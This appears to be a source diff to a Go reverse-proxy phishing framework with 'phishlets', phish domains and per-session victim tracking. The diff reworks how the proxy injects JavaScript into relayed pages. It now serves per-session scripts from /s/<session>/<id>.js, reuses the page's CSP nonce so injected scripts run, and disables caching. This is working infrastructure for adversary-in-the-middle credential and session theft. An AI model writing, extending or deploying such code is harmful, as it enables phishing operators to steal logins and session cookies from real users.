@@ -185,41 +185,84 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				//req_path += "?" + req.URL.RawQuery
 			}
 
-			//log.Debug("http: %s", req_url)
-
+			pl := p.getPhishletByPhishHost(req.Host)
 			parts := strings.SplitN(req.RemoteAddr, ":", 2)
 			remote_addr := parts[0]
 
 			redir_re := regexp.MustCompile("^\\/s\\/([^\\/]*)")
-			if redir_re.MatchString(req.URL.Path) {
+			js_inject_re := regexp.MustCompile("^\\/s\\/([^\\/]*)\\/([^\\/]*)")
+
+			if js_inject_re.MatchString(req.URL.Path) {
+				ra := js_inject_re.FindStringSubmatch(req.URL.Path)
+				if len(ra) >= 3 {
+					session_id := ra[1]
+					js_id := ra[2]
+					if strings.HasSuffix(js_id, ".js") {
+						js_id = js_id[:len(js_id)-3]
+						if s, ok := p.sessions[session_id]; ok {
+							var d_body string
+							var js_params *map[string]string = nil
+							js_params = &s.Params
+
+							script, err := pl.GetScriptInjectById(js_id, js_params)
+							if err == nil {
+								d_body += script + "\n\n"
+							} else {
+								log.Warning("js_inject: script not found: '%s'", js_id)
+							}
+							resp := goproxy.NewResponse(req, "application/javascript", 200, string(d_body))
+							return req, resp
+						} else {
+							log.Warning("js_inject: session not found: '%s'", session_id)
+						}
+					}
+				}
+			} else if redir_re.MatchString(req.URL.Path) {
 				ra := redir_re.FindStringSubmatch(req.URL.Path)
 				if len(ra) >= 2 {
 					session_id := ra[1]
-					if _, ok := p.sessions[session_id]; ok {
-						redirect_url, ok := p.waitForRedirectUrl(session_id)
-						if ok {
-							type ResponseRedirectUrl struct {
-								RedirectUrl string `json:"redirect_url"`
+					if strings.HasSuffix(session_id, ".js") {
+						// respond with injected javascript
+						session_id = session_id[:len(session_id)-3]
+						if s, ok := p.sessions[session_id]; ok {
+							var d_body string
+
+							if s.RedirectURL != "" {
+								dynamic_redirect_js := DYNAMIC_REDIRECT_JS
+								dynamic_redirect_js = strings.ReplaceAll(dynamic_redirect_js, "{session_id}", s.Id)
+								d_body += dynamic_redirect_js + "\n\n"
 							}
-							d_json, err := json.Marshal(&ResponseRedirectUrl{RedirectUrl: redirect_url})
-							if err == nil {
-								s_index, _ := p.sids[session_id]
-								log.Important("[%d] dynamic redirect to URL: %s", s_index, redirect_url)
-								resp := goproxy.NewResponse(req, "application/json", 200, string(d_json))
-								return req, resp
-							}
+							resp := goproxy.NewResponse(req, "application/javascript", 200, string(d_body))
+							return req, resp
+						} else {
+							log.Warning("js: session not found: '%s'", session_id)
 						}
-						resp := goproxy.NewResponse(req, "application/json", 408, "")
-						return req, resp
 					} else {
-						log.Warning("api: session not found: '%s'", session_id)
+						if _, ok := p.sessions[session_id]; ok {
+							redirect_url, ok := p.waitForRedirectUrl(session_id)
+							if ok {
+								type ResponseRedirectUrl struct {
+									RedirectUrl string `json:"redirect_url"`
+								}
+								d_json, err := json.Marshal(&ResponseRedirectUrl{RedirectUrl: redirect_url})
+								if err == nil {
+									s_index, _ := p.sids[session_id]
+									log.Important("[%d] dynamic redirect to URL: %s", s_index, redirect_url)
+									resp := goproxy.NewResponse(req, "application/json", 200, string(d_json))
+									return req, resp
+								}
+							}
+							resp := goproxy.NewResponse(req, "application/json", 408, "")
+							return req, resp
+						} else {
+							log.Warning("api: session not found: '%s'", session_id)
+						}
 					}
 				}
 			}
 
 			phishDomain, phished := p.getPhishDomain(req.Host)
 			if phished {
-				pl := p.getPhishletByPhishHost(req.Host)
 				pl_name := ""
 				if pl != nil {
 					pl_name = pl.Name
@@ -525,6 +568,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						}
 					}
 				}
+
+				// prevent caching
+				req.Header.Set("Cache-Control", "no-cache")
 
 				// fix sec-fetch-dest
 				sec_fetch_dest := req.Header.Get("Sec-Fetch-Dest")
@@ -1005,23 +1051,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 							var js_params *map[string]string = nil
 							if s, ok := p.sessions[ps.SessionId]; ok {
-								/*
-									if s.PhishLure != nil {
-										js_params = &s.PhishLure.Params
-									}*/
 								js_params = &s.Params
 							}
 							//log.Debug("js_inject: hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
-							script, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
+							js_id, _, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
 							if err == nil {
-								body = p.injectJavascriptIntoBody(body, script)
+								body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s/%s.js", s.Id, js_id))
 							}
 
-							if s.RedirectURL != "" {
-								dynamic_redirect_js := DYNAMIC_REDIRECT_JS
-								dynamic_redirect_js = strings.ReplaceAll(dynamic_redirect_js, "{session_id}", s.Id)
-								body = p.injectJavascriptIntoBody(body, dynamic_redirect_js)
-							}
+							log.Debug("js_inject: injected redirect script for session: %s", s.Id)
+							body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s.js", s.Id))
 						}
 					}
 				}
@@ -1053,6 +1092,10 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						}
 					}
 				}
+			}
+
+			if stringExists(mime, []string{"text/html", "application/javascript", "text/javascript", "application/json"}) {
+				resp.Header.Set("Cache-Control", "no-cache, no-store")
 			}
 
 			if pl != nil && ps.SessionId != "" {
@@ -1150,7 +1193,7 @@ func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string) (*http.Re
 	return req, nil
 }
 
-func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string) []byte {
+func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string, src_url string) []byte {
 	js_nonce_re := regexp.MustCompile(`(?i)<script.*nonce=['"]([^'"]*)`)
 	m_nonce := js_nonce_re.FindStringSubmatch(string(body))
 	js_nonce := ""
@@ -1158,7 +1201,15 @@ func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string) []byte 
 		js_nonce = " nonce=\"" + m_nonce[1] + "\""
 	}
 	re := regexp.MustCompile(`(?i)(<\s*/body\s*>)`)
-	ret := []byte(re.ReplaceAllString(string(body), "<script"+js_nonce+">"+script+"</script>${1}"))
+	var d_inject string
+	if script != "" {
+		d_inject = "<script" + js_nonce + ">" + script + "</script>\n${1}"
+	} else if src_url != "" {
+		d_inject = "<script" + js_nonce + " type=\"application/javascript\" src=\"" + src_url + "\"></script>\n${1}"
+	} else {
+		return body
+	}
+	ret := []byte(re.ReplaceAllString(string(body), d_inject))
 	return ret
 }
 
